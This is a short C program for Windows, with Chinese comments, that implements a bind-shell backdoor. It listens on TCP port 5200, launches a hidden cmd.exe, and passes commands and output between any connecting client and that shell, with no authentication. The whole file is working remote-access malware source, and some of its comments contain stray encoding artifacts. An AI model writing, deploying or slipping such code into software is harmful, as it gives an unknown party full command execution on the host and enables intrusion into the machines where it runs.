#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"Ws2_32")
int main()
{
WSADATA ws;
SOCKET listenFD;
char Buff[1024];
int ret;
//初始化WSA
WSAStartup(MAKEWORD(2,2),&ws);
//建立socket
listenFD=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
//監(jiān)聽(tīng)本機(jī)5200端口
struct sockaddr_in server;
server.sin_family=AF_INET;
server.sin_port=htons(5200);
server.sin_addr.s_addr=ADDR_ANY;
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,2);
//如果客戶請(qǐng)求5200端口,接受連接
int iAddrSize=sizeof(server);
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
SECURITY_ATTRIBUTES pipeattr1,pipeattr2;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
//建立匿名管道1
pipeattr1.nLength=12;
pipeattr1.lpSecurityDescriptor=0;
pipeattr1.bInheritHandle=true;
CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
//建立匿名管道2
pipeattr2.nLength=12;
pipeattr2.lpSecurityDescriptor=0;
pipeattr2.bInheritHandle=true;
CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput=hReadPipe2;
si.hStdOutput=si.hStdError=hWritePipe1;
char cmdline[]="cmd.exe";
PROCESS_INFORMATION ProcessInformation;
//建立進(jìn)程
ret=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
unsigned long lBytesRead;
while (1)
{
//檢查管道1,即CMD進(jìn)程是否有輸出
ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
if (lBytesRead)
{
//管道1有輸出,輸出結(jié)果發(fā)給遠(yuǎn)程客戶機(jī)
ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
if (!ret) break;
ret=send(clientFD,Buff,lBytesRead,0);
if (ret<=0) break;
}
else
{
//否則,接受遠(yuǎn)程客戶機(jī)命令
lBytesRead=recv(clientFD,Buff,1024,0);
if (lBytesRead<=0) break;
//將命令寫(xiě)入管道2,即傳給CMD進(jìn)程
ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
if (!ret) break;
}
}
return 0;
}
